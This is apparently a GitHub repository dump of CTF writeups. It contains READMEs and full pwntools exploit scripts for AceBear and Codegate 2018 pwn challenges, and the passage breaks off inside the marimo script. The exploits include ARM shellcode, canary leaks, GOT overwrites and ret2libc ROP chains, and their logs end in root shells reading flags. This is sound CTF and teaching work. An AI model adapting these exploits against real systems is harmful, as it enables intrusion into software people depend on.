├── 2018 ├── AceBearSecurityContest │ ├── README.md │ └── pwn │ │ ├── arm_exploit │ │ ├── README.md │ │ ├── arm-exploit │ │ └── arm_exploit.py │ │ ├── easy_heap │ │ ├── README.md │ │ ├── easy_heap │ │ ├── easy_heap.py │ │ └── easyheap_libc.so.6 │ │ └── lolgame │ │ ├── LOLgame │ │ ├── README.md │ │ └── lolgame.py ├── Codegate CTF 2018 Preliminary │ ├── BaskinRobins31 │ │ ├── BaskinRobins31 │ │ └── BaskinRobins31.py │ ├── marimo │ │ ├── marimo │ │ └── marimo.py │ └── melong │ │ ├── melong │ │ └── melong.py ├── HITBXCTF │ ├── misc │ │ ├── pix │ │ │ ├── README.md │ │ │ ├── aee487a2-49cd-4f1f-ada6-b2d398342d99.SteinsGate │ │ │ └── keepass.kdbx │ │ └── tpyx │ │ │ ├── README.md │ │ │ ├── e47c7307-b54c-4316-9894-5a8daec738b4.png │ │ │ ├── flag │ │ │ ├── tpyx │ │ │ ├── tpyx2 │ │ │ └── tpyx2.zlib │ └── pwn │ │ ├── babypwn │ │ └── babypwn.py │ │ ├── d │ │ ├── d │ │ └── d.py │ │ └── once │ │ ├── libc-2.23.so │ │ ├── once │ │ └── once.py ├── ISITDTU CTF 2018 Quals │ ├── babyformat │ │ ├── babyformat │ │ └── babyformat.py │ └── encode │ │ └── encode.py ├── N1CTF │ └── pwn │ │ └── beeper │ │ ├── beeper │ │ └── beeper.py ├── Ph03nixCTF-2018 │ └── RE │ │ ├── RE150 │ │ └── chall-0124a47969d0e6ff9ff639198decbea2 │ │ ├── RE200 │ │ ├── RE200.exe │ │ ├── RE200.py │ │ ├── README.md │ │ └── re200.bat │ │ └── RE350 │ │ ├── README.md │ │ ├── chall-95464f47e71ccb883149755d7a3573bb │ │ └── chall-95464f47e71ccb883149755d7a3573bb.py ├── VolgaCTF │ ├── CrackMe │ │ └── CrackMe.py │ ├── You_Shall_Not_Pass │ │ ├── README.md │ │ └── solve.py │ ├── lights │ │ ├── README.md │ │ └── lights.idb │ └── xor_trick │ │ ├── MeePwn.png │ │ └── xor_trick.py ├── WhiteHatGrandPrix2018quals │ ├── giftshop_pwn01 │ │ ├── README.md │ │ ├── blacklist.conf │ │ ├── flag.txt │ │ ├── giftshop │ │ ├── giftshop.py │ │ ├── ptrace_64 │ │ └── run.sh │ └── re06 │ │ ├── README.md │ │ ├── re06.cs │ │ ├── result.png │ │ └── reverse.exe ├── angstromCTF │ ├── hellcode │ │ ├── hellcode │ │ └── hellcode.py │ └── letter │ │ ├── 
letter.py │ │ └── personal_letter32 ├── bytebandit │ ├── ROP_Crazy │ │ ├── gg │ │ └── ropcrazy.py │ └── twisted │ │ ├── libc.so.6 │ │ ├── twisted.py │ │ ├── twisted_local.py │ │ └── twisted_patched ├── insecurity-insa │ └── Gcorp Stage 2 │ │ ├── dna │ │ └── dna.py ├── matesctf_pwn │ ├── bmhh │ │ ├── bmhh │ │ └── bmhh.py │ ├── echo │ │ ├── echo │ │ └── echo.py │ ├── explorer │ │ ├── explorer │ │ └── explorer.py │ ├── harrypotter │ │ ├── harrypotter │ │ └── harrypotter.py │ ├── petshop │ │ ├── petshop │ │ └── petshop.py │ └── unexploitable │ │ ├── payload │ │ ├── vuln_app │ │ └── vuln_app.py ├── matesctf_session3 │ └── round2 │ │ ├── libc-2.23.so │ │ ├── xmodem │ │ └── xmodem.py ├── pragyan │ ├── aes_enc_unbf │ │ ├── aes_enc_unbf │ │ ├── aes_enc_unbf.py │ │ ├── iv.aes │ │ └── key.aes │ └── police_academy │ │ ├── police_academy │ │ └── police_academy.py ├── sunshinectf │ ├── Hexalicious │ │ ├── Hexalicious.py │ │ ├── flag.txt │ │ ├── hexalicious │ │ └── libpwnableharness32.so │ ├── UAF │ │ ├── libc.so.6 │ │ ├── libpwnableharness32.so │ │ ├── uaf │ │ └── uaf.py │ ├── logsearch │ │ ├── .data │ │ ├── flag.txt │ │ ├── libpwnableharness32.so │ │ ├── logs.txt │ │ ├── logsearch │ │ └── logsearch.py │ └── rot13 │ │ ├── libc.so.6 │ │ ├── libpwnableharness32.so │ │ ├── rot13 │ │ └── rot13.py └── swampctf │ ├── Dungeon_Crawl │ ├── dungeon.py │ └── libc.so.6 │ ├── Power_QWORD │ ├── libc.so.6 │ ├── power │ └── power.py │ └── Syscaller_Lament │ ├── syscaller │ └── syscaller.py ├── 2019 ├── Insomni'hack teaser 2019 │ └── onewrite │ │ ├── onewrite │ │ └── onewrite.py ├── defcon │ └── speedrun │ │ └── speedrun-001 │ │ ├── README.md │ │ ├── speedrun-001 │ │ ├── speedrun-001.1 │ │ └── speedrun-001.py ├── hitcon_quals │ └── trick_or_treat │ │ ├── libc.so.6 │ │ ├── trick_or_treat │ │ └── trick_or_treat.py └── tetctf.cf │ ├── babyfirst │ ├── babyfirst │ ├── babyfirst.py │ └── libc-2.27.so │ └── sandbox │ ├── README.md │ ├── program │ ├── sandbox │ ├── sandbox.py │ ├── server.py │ ├── test 
│ └── test.c ├── 2020 └── tetctf │ └── babyarmshellcode │ ├── binary │ ├── babyfmt │ │ ├── babyfmt │ │ └── run.sh │ └── babyshellcode │ │ ├── babyshellcode │ │ └── run.sh │ ├── solution │ ├── babyshellcode.py │ └── server_backconnect.py │ └── xinetd.d │ ├── babyfmt_xinetd │ └── babyshellcode_xinetd ├── 2021 └── ISITDTU_final │ ├── main.c │ └── solve.py ├── 2022 ├── ISITDTU CTF 2022 FINALS │ └── whitelist_sc │ │ ├── whitelist_sc │ │ └── whitelist_sc.py └── TetCTF 2023 │ └── pwn01 │ ├── 1MB │ ├── chall │ ├── libc.so.6 │ └── solve.py ├── 2023 └── ISITDTU CTF QUALS 2023 │ └── pivot │ ├── packets_cleartext.pcap │ ├── packets_pubkey.pcap │ ├── pivot.c │ ├── pivot.py │ ├── pivot_docker.tar.gz │ ├── plaintext.pcap │ └── pubkey.pcap ├── README.md └── quiz └── cau48 ├── cau48 ├── cau48.c └── cau48.py /2018/AceBearSecurityContest/README.md: -------------------------------------------------------------------------------- 1 | # AceBear Security Contest 2 | * 3 | * [Scoreboard](https://ctf.acebear.site/scoreboard) 4 | * Facebook: 5 | 6 | # Writeups 7 | * [easy heap](pwn/easy_heap) 8 | * [arm_exploit](pwn/arm_exploit) 9 | * [lolgame](pwn/lolgame) 10 | -------------------------------------------------------------------------------- /2018/AceBearSecurityContest/pwn/arm_exploit/README.md: -------------------------------------------------------------------------------- 1 | # arm-exploit 2 | **Category:** Pwnable 3 | **Points:** 856 4 | **Solves:** 13 5 | **Description:** 6 | > Download in : [Link](https://drive.google.com/open?id=1aM2CTWFxKetOTMNfck71Bxv_ZGw05IzF) 7 | > Service: nc armexploit.acebear.site 3001 8 | 9 | ## Writeup 10 | ``` 11 | $ file arm-exploit 12 | arm-exploit: ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.3, for GNU/Linux 3.2.0, BuildID[sha1]=cbaf26f5088911adc7a36ef8ac96660a33f617d1, not stripped 13 | ``` 14 | 15 | ### Setup Environment 16 | #### Install 17 | ``` 18 | sudo apt-get install qemu 19 | sudo 
apt-get install qemu-user-static kpartx 20 | sudo apt-get install gdb-multiarch 21 | ``` 22 | 23 | #### Run 24 | ``` 25 | $ qemu-arm-static ./arm-exploit 26 | **************************Welcome to Arm Exploit************************** 27 | * * 28 | *************************Challenge Created By CNV************************* 29 | * Team: AceBear * 30 | * My blog: https://chung96vn.blogspot.com/ * 31 | ************************************************************************** 32 | *******************Arm Exploit****************** 33 | * * 34 | * 1 - info * 35 | * 2 - login * 36 | * 3 - echo * 37 | * 4 - change username * 38 | * 5 - exit * 39 | ************************************************ 40 | Your choice: 41 | ``` 42 | 43 | #### Debug over gdb-multiarch 44 | Terminal 1 45 | > qemu-arm-static -g 12345 ./arm-exploit 46 | 47 | Terminal 2 48 | ``` 49 | $ gdb-multiarch 50 | pwndbg> set architecture arm 51 | The target architecture is assumed to be arm 52 | pwndbg> target remote localhost:12345 53 | Remote debugging using localhost:12345 54 | 0xf67d6a40 in ?? () 55 | ... 56 | ► f 0 f67d6a40 57 | pwndbg> 58 | ``` 59 | 60 | #### Run over python script 61 | ```python 62 | import pwntools 63 | r = process(["qemu-arm-static","-g","12345", "./arm-exploit"]) # run and debug 64 | r = process(["qemu-arm-static","./arm-exploit"]) # Just run 65 | ``` 66 | 67 | ### The Bug 68 | Binary has some functions: genpass, info, login, echo, change username and exit. 69 | 70 | First bug in **change_username** function: 71 | * user input max 0x20 bytes into buf on stack 72 | * strcpy(USER, buf) if 0x20 bytes buf not null then 0x20 bytes copy into USER and last null bytes will copy to USER+0x20 == isGuestLogin => isGuestLogin = 0 => bypass root login then we can use rootecho function. 
73 | ``` 74 | .bss:0002209C USER % 0x20 ; DATA XREF: info+28↑o 75 | .bss:000220BC isGuestLogin % 4 ; DATA XREF: info+48↑r 76 | ``` 77 | 78 | Second bug in **rootecho** function: 79 | * buff in FP-0x88 but read 0x100 bytes => stack overflow. 80 | ```c 81 | int rootecho() 82 | { 83 | int result; // r0 84 | char s1; // [sp+4h] [bp-88h] 85 | _BYTE v2[3]; // [sp+9h] [bp-83h] 86 | int v3; // [sp+84h] [bp-8h] 87 | 88 | v3 = _bss_start; 89 | while ( 1 ) 90 | { 91 | printf("root@arm-exploit:~$ "); 92 | secure_read(&s1, 0x100u); // <======= Bug Here 93 | result = strcmp(&s1, "exit"); 94 | if ( !result ) 95 | break; 96 | if ( !strcmp(&s1, "help") ) 97 | { 98 | puts("List command:"); 99 | puts("$ echo argument"); 100 | puts("$ exit"); 101 | puts("$ help"); 102 | } 103 | else if ( !memcmp(&s1, "echo ", 5u) ) 104 | { 105 | puts(v2); 106 | } 107 | else 108 | { 109 | puts("Invalid Command! Try help"); 110 | } 111 | } 112 | return result; 113 | } 114 | ``` 115 | ### Exploit 116 | [arm_exploit.py](/pwn/arm_exploit/arm_exploit.py) 117 | ``` 118 | $ python arm.py 3 119 | [+] Opening connection to armexploit.acebear.site on port 3001: Done 120 | [*] canary: 0xd4bae800 121 | [*] stack: 0xf6fffb34 122 | [*] buff: 0xf6fffab0 123 | [*] Paused (press any to continue) 124 | [*] Switching to interactive mode 125 | AAAAAAA0\x8f��/�xF\x0e0\x90I\x1a\x92\x1a'�Q\x037�/bin//sh 126 | root@arm-exploit:~$ $ id 127 | uid=1000(arm_exploit) gid=1000(arm_exploit) groups=1000(arm_exploit) 128 | $ cat /ho*/*/flag 129 | AceBear{arm_i5_my_sad_m3m0ry}$ 130 | ``` 131 | 132 | -------------------------------------------------------------------------------- /2018/AceBearSecurityContest/pwn/arm_exploit/arm-exploit: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/AceBearSecurityContest/pwn/arm_exploit/arm-exploit 
-------------------------------------------------------------------------------- /2018/AceBearSecurityContest/pwn/arm_exploit/arm_exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import sys 3 | 4 | def arm_exploit(DEBUG="1"): 5 | 6 | def login(username, password): 7 | r.sendline("2") 8 | r.recvuntil("Username: ") 9 | r.sendline(username) 10 | r.recvuntil("password: ") 11 | r.sendline(password) 12 | return r.recvuntil("Your choice: ") 13 | 14 | def info(): 15 | r.sendline("1") 16 | return r.recvuntil("Your choice: ") 17 | 18 | def changename(username): 19 | r.sendline("4") 20 | r.recvuntil("New username: ") 21 | r.sendline(username) 22 | return r.recvuntil("Your choice: ") 23 | 24 | def echo(payload): 25 | r.sendline("3") 26 | r.recvuntil(":~$") 27 | r.send(payload) 28 | if "echo" in payload: 29 | res=r.recvuntil(payload[4:]) 30 | leak = r.recv(4) 31 | r.recvuntil(":~$") 32 | return leak 33 | 34 | def echo2(payload): 35 | r.send(payload) 36 | 37 | if DEBUG=="1": 38 | r = process(["qemu-arm-static","-g","12345", "./arm-exploit"]) 39 | raw_input("Debug?") 40 | elif DEBUG=="2": 41 | r = process(["qemu-arm-static","./arm-exploit"]) 42 | raw_input("Debug?") 43 | elif DEBUG=="3": 44 | HOST = "armexploit.acebear.site" 45 | PORT = 3001 46 | r = remote(HOST,PORT) 47 | 48 | shellcode = "\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x78\x46\x0e\x30\x01\x90\x49\x1a\x92\x1a\x08\x27\xc2\x51\x03\x37\x01\xdf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x00" 49 | 50 | r.recvuntil("Your choice: ") 51 | login("concavang","concavang") # logined = 1 52 | 53 | username = "A"*0x20 54 | changename(username) 55 | username = "root" 56 | changename(username) # isGuestLogin = 0 57 | 58 | payload = "echo " 59 | payload += "C"*0x7c 60 | canary = u32("\x00"+echo(payload)[:3]) 61 | log.info('canary: %#x' % canary) 62 | 63 | payload = "echo " 64 | payload += "C"*0x7f 65 | stack = u32(echo(payload)) 66 | log.info('stack: %#x' % stack) 67 | 68 | buff = 
stack-0x84 69 | log.info('buff: %#x' % buff) 70 | 71 | 72 | payload = "echo " 73 | payload += "A"*7 74 | payload += shellcode 75 | payload += "C"*(0x74-len(shellcode)) 76 | payload += p32(canary) 77 | payload += p32(buff-0x100) # SP 78 | payload += p32(buff) # PC 79 | 80 | echo2(payload) 81 | pause() 82 | echo2("exit\n") 83 | r.interactive() 84 | 85 | 86 | 87 | 88 | arm_exploit(sys.argv[1]) 89 | 90 | # target remote localhost:12345 91 | # AceBear{arm_i5_my_sad_m3m0ry} 92 | -------------------------------------------------------------------------------- /2018/AceBearSecurityContest/pwn/easy_heap/README.md: -------------------------------------------------------------------------------- 1 | # easy heap 2 | **Category:** Pwnable 3 | **Points:** 100 4 | **Solves:** 44 5 | **Description:** 6 | > Download in : [Link](https://drive.google.com/open?id=1VNi6Nbi5i-r9D5sZo_ZdgtUkA5u_3g8B) 7 | > Service: nc armexploit.acebear.site 3002 8 | 9 | ## Writeup 10 | ``` 11 | $ file easy_heap 12 | easy_heap: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=89e53b704c36245e1ab38a71c9f1349898e373ea, stripped 13 | ``` 14 | 15 | ### The Bug 16 | Binary has some functions: create, edit, delete, show and exit. 17 | 18 | 19 | * We can write address into bss by input **NAME (0x0804B0E0)**. 
20 | * Edit, delete, show functions not check idx if it is negative and integer overflow by **DWORD PTR [idx*4+0x0804B0A0]** 21 | 22 | ```c 23 | int show() 24 | { 25 | int idx; // [esp+Ch] [ebp-Ch] 26 | 27 | printf("Index: "); 28 | idx = readInt(); 29 | if ( idx > 9 ) 30 | return puts("Out of list name (0 <= index < 10)!!!"); 31 | if ( !LIST[idx] ) 32 | return puts("None name"); 33 | printf("This name %d is: %s\n", idx, LIST[idx]); 34 | return puts("Done!"); 35 | } 36 | 37 | int edit() 38 | { 39 | int idx; // [esp+Ch] [ebp-Ch] 40 | 41 | printf("Index: "); 42 | idx = readInt(); 43 | if ( idx > 9 ) 44 | return puts("Out of list name (0 <= index < 10)!!!"); 45 | if ( !LIST[idx] ) 46 | return puts("None name"); 47 | printf("Input new name: "); 48 | secure_read(LIST[idx], 0x20u); 49 | return puts("Done!"); 50 | } 51 | ``` 52 | 53 | So we can read and write arbitrary memory address. 54 | 55 | ### Exploit 56 | [easy_heap.py](/pwn/easy_heap/easy_heap.py) 57 | ``` 58 | $ python easy_heap.py 3 59 | [+] Opening connection to easyheap.acebear.site on port 3002: Done 60 | [*] atoi_got: 0xf7def050 61 | [*] baselibc: 0xf7dc2000 62 | [*] system: 0xf7dfc940 63 | [*] str_bin_sh: 0xf7f1b00b 64 | [*] Switching to interactive mode 65 | $ id 66 | uid=1000(easy_heap) gid=1000(easy_heap) groups=1000(easy_heap) 67 | $ cat /ho*/*/flag 68 | AceBear{m4yb3_h34p_i5_3a5y_f0r_y0u}$ 69 | ``` 70 | 71 | -------------------------------------------------------------------------------- /2018/AceBearSecurityContest/pwn/easy_heap/easy_heap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/AceBearSecurityContest/pwn/easy_heap/easy_heap -------------------------------------------------------------------------------- /2018/AceBearSecurityContest/pwn/easy_heap/easy_heap.py: -------------------------------------------------------------------------------- 1 | from pwn 
import * 2 | import time 3 | import sys 4 | 5 | def easy_heap(DEBUG): 6 | t = 0.3 7 | def Add(index, name): 8 | r.sendline("1") 9 | r.recvuntil("Index: ") 10 | r.sendline(str(index)) 11 | r.recvuntil("Input this name: ") 12 | r.send(name) 13 | time.sleep(t) 14 | res = r.recvuntil("Your choice:") 15 | return res 16 | 17 | def View(idx): 18 | r.sendline("4") 19 | r.recvuntil("Index: ") 20 | r.sendline(str(idx)) 21 | res = r.recvuntil("Done!") 22 | r.recvuntil("Your choice:") 23 | return res 24 | 25 | def Delete(idx): 26 | r.sendline("3") 27 | r.recvuntil("Index: ") 28 | r.sendline(str(idx)) 29 | res = r.recvuntil("Your choice:") 30 | return res 31 | 32 | def Edit(idx, name): 33 | r.sendline("2") 34 | r.recvuntil("Index: ") 35 | r.sendline(str(idx)) 36 | r.recvuntil("Input new name: ") 37 | r.send(name) 38 | time.sleep(t) 39 | res = r.recvuntil("Your choice:") 40 | return res 41 | 42 | 43 | def Exit(): 44 | r.sendline("5") 45 | 46 | if DEBUG=="1": 47 | t = 0.005 48 | r = process("./easy_heap") 49 | libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so') 50 | raw_input("debug?") 51 | elif DEBUG=="2": 52 | t = 0.01 53 | env = { 54 | 'LD_PRELOAD': './easyheap_libc.so.6' 55 | } 56 | r = process("./easy_heap",env=env) 57 | libc = ELF('./easyheap_libc.so.6') 58 | raw_input("debug?") 59 | elif DEBUG=="3": 60 | offset_main_arena = 0x3c3af0 61 | libc = ELF('./easyheap_libc.so.6') 62 | HOST = 'easyheap.acebear.site' 63 | PORT = 3002 64 | r = remote(HOST,PORT) 65 | 66 | free_got = 0x804B018 67 | atoi_got = 0x0804B038 68 | stdout = 0x0804B084 69 | NAME = p32(atoi_got) # 0x0804B0E0 70 | AGE = 0x40 71 | r.recvuntil("Give me your name: ") 72 | r.sendline(NAME) 73 | r.recvuntil("Your age: ") 74 | r.sendline(str(AGE)) 75 | r.recvuntil("Your choice: ") 76 | 77 | idx = -2147483632 # idx < 9, DWORD PTR [idx*4+0x0804B0A0] == 0x0804B0E0 (NAME) 78 | # leak atoi_got 79 | res = View(idx) 80 | atoi_got = u32(res.split(" is: ")[1][:4]) 81 | baselibc = atoi_got - libc.symbols['atoi'] 82 | system = 
baselibc + libc.symbols['system'] 83 | str_bin_sh = baselibc+next(libc.search("/bin/sh")) 84 | 85 | log.info('atoi_got: %#x' % atoi_got) 86 | log.info('baselibc: %#x' % baselibc) 87 | log.info('system: %#x' % system) 88 | log.info('str_bin_sh: %#x' % str_bin_sh) 89 | 90 | # overwrite atoi_got by system address 91 | Edit(idx, p32(system)) 92 | r.sendline("/bin/sh") 93 | 94 | r.interactive() 95 | 96 | easy_heap(sys.argv[1]) 97 | # AceBear{m4yb3_h34p_i5_3a5y_f0r_y0u} -------------------------------------------------------------------------------- /2018/AceBearSecurityContest/pwn/easy_heap/easyheap_libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/AceBearSecurityContest/pwn/easy_heap/easyheap_libc.so.6 -------------------------------------------------------------------------------- /2018/AceBearSecurityContest/pwn/lolgame/LOLgame: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/AceBearSecurityContest/pwn/lolgame/LOLgame -------------------------------------------------------------------------------- /2018/AceBearSecurityContest/pwn/lolgame/README.md: -------------------------------------------------------------------------------- 1 | # lol game 2 | **Category:** Pwnable 3 | **Points:** 831 4 | **Solves:** 14 5 | **Description:** 6 | > Download in : [Link](https://drive.google.com/open?id=15XYB41jAtwH58LxNDhRQSXWHaqzJ9cdZ) 7 | > Service: nc armexploit.acebear.site 3004 8 | 9 | ## Writeup 10 | ``` 11 | $ file LOLgame 12 | LOLgame: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=a9d22e211c215fa4e68630a6cf0c9eeb610eba24, stripped 13 | ``` 14 | 15 | ### The Bug 16 | Binary has some functions: 
Play, showScore, ChangeName and exit. 17 | 18 | Function ChangeName: 19 | ```c 20 | int __cdecl main() 21 | { 22 | char name; // [esp+4h] [ebp-E4h] 23 | char round; // [esp+14h] [ebp-D4h] 24 | ... 25 | ChangeName(&name); 26 | ... 27 | } 28 | ``` 29 | ```c 30 | int __cdecl ChangeName(void *buf) 31 | { 32 | ssize_t size; // eax 33 | int result; // eax 34 | ssize_t _size; // [esp+Ch] [ebp-Ch] 35 | 36 | size = read(0, buf, 0x11u); 37 | _size = size; 38 | result = *(buf + size - 1); 39 | if ( result == 10 ) 40 | { 41 | result = buf + _size - 1; 42 | *result = 0; 43 | } 44 | return result; 45 | } 46 | ``` 47 | 48 | We can see stack overflow in ChangeName function. 49 | * name in ebp-0xE4 50 | * round in ebp-0xD4 51 | * but read(0, name, 0x11) 52 | so we can overwrite **round** variable. 53 | 54 | In Play function: 55 | * We can bet any points (both positive and negative number) 56 | * We always lose, then *(&game->round + game->round) = -bet; 57 | 58 | We can control game->round by ChangeName function, we can bet any points. So we can overwrite return address on stack. 59 | 60 | ### Exploit 61 | [lolgame.py](/pwn/lolgame/lolgame.py) 62 | ``` 63 | $ python lolgame.py 2 64 | [+] Opening connection to lolgame.acebear.site on port 3004: Done 65 | [*] write at 57 value 0x80483c0 66 | [*] write at 58 value 0x8048a2a 67 | [*] write at 59 value 0x8049108 68 | [*] printf: 0xf7dab880 69 | [*] baselibc: 0xf7d62000 70 | [*] system: 0xf7d9c900 71 | [*] str_bin_sh: 0xf7ebf00f 72 | [*] write at 55 value 0xf7d9c900 73 | [*] write at 56 value 0x8048a2a 74 | [*] write at 57 value 0xf7ebf00f 75 | ? 
76 | [*] Switching to interactive mode 77 | Bye!$ id 78 | uid=1000(lolgame) gid=1000(lolgame) groups=1000(lolgame) 79 | $ cat /ho*/*/flag 80 | AceBear{tH4_r00t_1s_pr0gr4m_l3u7_u_are_hum4n}$ 81 | ``` 82 | 83 | -------------------------------------------------------------------------------- /2018/AceBearSecurityContest/pwn/lolgame/lolgame.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | import sys 4 | 5 | def LOLgame(DEBUG): 6 | def showScore(): 7 | r.sendline("2") 8 | return r.recvuntil("Your Choice:\n") 9 | 10 | def ChangeName(name): 11 | r.sendline("3") 12 | r.recvuntil("Enter your name: ") 13 | r.send(name) 14 | return r.recvuntil("Your Choice:\n") 15 | 16 | def Play(point): 17 | r.sendline("1") 18 | r.recvuntil("Enter Your Bet Point: ") 19 | r.sendline(str(point)) 20 | r.sendline("1") 21 | r.sendline("1") 22 | r.sendline("2") 23 | r.sendline("2") 24 | r.sendline("3") 25 | r.sendline("3") 26 | return r.recvuntil("Your Choice:\n") 27 | 28 | def write(offset, value): 29 | log.info('write at %d value %#x' % (offset, value)) 30 | ChangeName("A"*0x10+chr(offset)) 31 | Play(-value) 32 | 33 | def Exit(): 34 | r.sendline("4") 35 | 36 | if DEBUG=="1": 37 | offset_printf = 0x00049670 38 | offset_system = 0x0003ada0 39 | offset_str_bin_sh = 0x15ba0b 40 | r = process("./LOLgame") 41 | raw_input("debug?") 42 | elif DEBUG=="2": 43 | offset_system = 0x0003a900 44 | offset_str_bin_sh = 0x15d00f 45 | offset_printf = 0x00049880 46 | HOST = 'lolgame.acebear.site' 47 | PORT = 3004 48 | r = remote(HOST,PORT) 49 | 50 | printf_plt = 0x080483C0 51 | puts_plt = 0x080483D0 52 | puts_got = 0x0804910C 53 | printf_got = 0x08049108 54 | __libc_start_main_got = 0x08049110 55 | main = 0x08048A2A 56 | ret = 0x08048B72 57 | bye = 0x08048B59 58 | 59 | name = "A"*0x10 60 | name += chr(0x35) 61 | r.recvuntil("Enter your name: ") 62 | r.send(name) 63 | 64 | write(0x39, printf_plt) 65 | write(0x3a, main) 66 | write(0x3b, 
printf_got) 67 | Exit() 68 | r.recvuntil("Bye!") 69 | printf = u32(r.recv(4)) 70 | log.info('printf: %#x' % printf) 71 | baselibc = printf - offset_printf 72 | system = baselibc + offset_system 73 | str_bin_sh = baselibc + offset_str_bin_sh 74 | log.info('baselibc: %#x' % baselibc) 75 | log.info('system: %#x' % system) 76 | log.info('str_bin_sh: %#x' % str_bin_sh) 77 | 78 | name = "A"*0x10 79 | name += chr(0x35) 80 | r.recvuntil("Enter your name: ") 81 | r.send(name) 82 | write(0x37, system) 83 | write(0x38, main) 84 | write(0x39, str_bin_sh) 85 | 86 | raw_input("?") 87 | Exit() 88 | 89 | r.interactive() 90 | 91 | LOLgame(sys.argv[1]) 92 | # AceBear{tH4_r00t_1s_pr0gr4m_l3u7_u_are_hum4n} 93 | # https://libc.blukat.me/?q=puts%3A0xf7e69940%2C__libc_start_main%3A0xf7d74180%2Cprintf%3A0xf7dfb880&l=libc6-i386_2.24-9ubuntu2.2_amd64 -------------------------------------------------------------------------------- /2018/Codegate CTF 2018 Preliminary/BaskinRobins31/BaskinRobins31: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/Codegate CTF 2018 Preliminary/BaskinRobins31/BaskinRobins31 -------------------------------------------------------------------------------- /2018/Codegate CTF 2018 Preliminary/BaskinRobins31/BaskinRobins31.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | import sys 4 | 5 | def BaskinRobins31(DEBUG): 6 | t = 0.3 7 | 8 | if DEBUG=="1": 9 | t = 0.005 10 | r = process("./BaskinRobins31") 11 | offset_main_arena = 0x3c4af0 12 | offset_one_gadget = 0xf1117 13 | # libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so') 14 | raw_input("debug?") 15 | elif DEBUG=="2": 16 | offset___libc_start_main = 0x0000000000020740 17 | offset_system = 0x0000000000045390 18 | offset_str_bin_sh = 0x18cd57 19 | # libc = ELF('./libc_64.so.6') 20 | HOST = 
'ch41l3ng3s.codegate.kr' 21 | PORT = 3131 22 | r = remote(HOST,PORT) 23 | 24 | pop_rdi_ret = 0x400bc3 25 | printf_plt = 0x4006E0 26 | printf_got = 0x602030 27 | __libc_start_main_got = 0x602048 28 | main = 0x400A4B 29 | # Author = "A"*0x40 30 | r.recvuntil("How many numbers do you want to take ? (1-3)") 31 | payload = "A"*0xb8 32 | payload += p64(pop_rdi_ret) 33 | payload += p64(__libc_start_main_got) 34 | payload += p64(printf_plt) 35 | payload += p64(main) 36 | r.sendline(payload) 37 | r.recvuntil("Don't break the rules...:( \n") 38 | 39 | res = r.recvuntil("#")[:-1] 40 | __libc_start_main = u64(res.ljust(8,"\x00")) 41 | log.info('__libc_start_main: %#x' % __libc_start_main) 42 | baselibc = __libc_start_main - offset___libc_start_main 43 | system = baselibc + offset_system 44 | bin_sh = baselibc + offset_str_bin_sh 45 | log.info('baselibc: %#x' % baselibc) 46 | log.info('system: %#x' % system) 47 | log.info('bin_sh: %#x' % bin_sh) 48 | 49 | payload = "A"*0xb8 50 | payload += p64(pop_rdi_ret) 51 | payload += p64(bin_sh) 52 | payload += p64(system) 53 | payload += p64(main) 54 | r.sendline(payload) 55 | r.interactive() 56 | 57 | BaskinRobins31(sys.argv[1]) 58 | 59 | -------------------------------------------------------------------------------- /2018/Codegate CTF 2018 Preliminary/marimo/marimo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/Codegate CTF 2018 Preliminary/marimo/marimo -------------------------------------------------------------------------------- /2018/Codegate CTF 2018 Preliminary/marimo/marimo.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | import sys 4 | 5 | def marimo(DEBUG): 6 | t = 0.3 7 | def Special(name, profile): 8 | r.sendline("show me the marimo") 9 | r.recvuntil(">> ") 10 | r.sendline(name) 11 | # time.sleep(t) 12 | 
r.recvuntil(">> ") 13 | r.sendline(profile) 14 | # time.sleep(t) 15 | return r.recvuntil(">> ") 16 | 17 | 18 | def Shell(idx): 19 | r.sendline("S") 20 | r.recvuntil(">> ") 21 | r.sendline(str(idx)) 22 | res = r.recvuntil(" dollars.") 23 | r.sendline("S") 24 | r.recvuntil(">> ") 25 | return res 26 | 27 | def View(idx, newprofile=""): 28 | r.sendline("V") 29 | r.recvuntil(">> ") 30 | r.sendline(str(idx)) 31 | res = r.recvuntil(">> ") 32 | if len(newprofile)>0: 33 | r.sendline("M") 34 | r.recvuntil(">> ") 35 | r.sendline(newprofile) 36 | res = r.recvuntil(">> ") 37 | # time.sleep(t) 38 | r.sendline("B") 39 | r.recvuntil(">> ") 40 | return res 41 | def Wait(seconds): 42 | for i in xrange(seconds): 43 | log.info("%d/%d seconds" % (i,seconds)) 44 | time.sleep(1) 45 | 46 | def Exit(): 47 | r.sendline("Q") 48 | 49 | if DEBUG=="1": 50 | t = 0.005 51 | offset_system = 0x45390 52 | offset__libc_start_main = 0x20740 53 | r = process("./marimo") 54 | raw_input("debug?") 55 | elif DEBUG=="2": 56 | # libc6_2.23-0ubuntu10_amd64 57 | offset_system = 0x45390 58 | offset__libc_start_main = 0x20740 59 | HOST = 'ch41l3ng3s.codegate.kr' 60 | PORT = 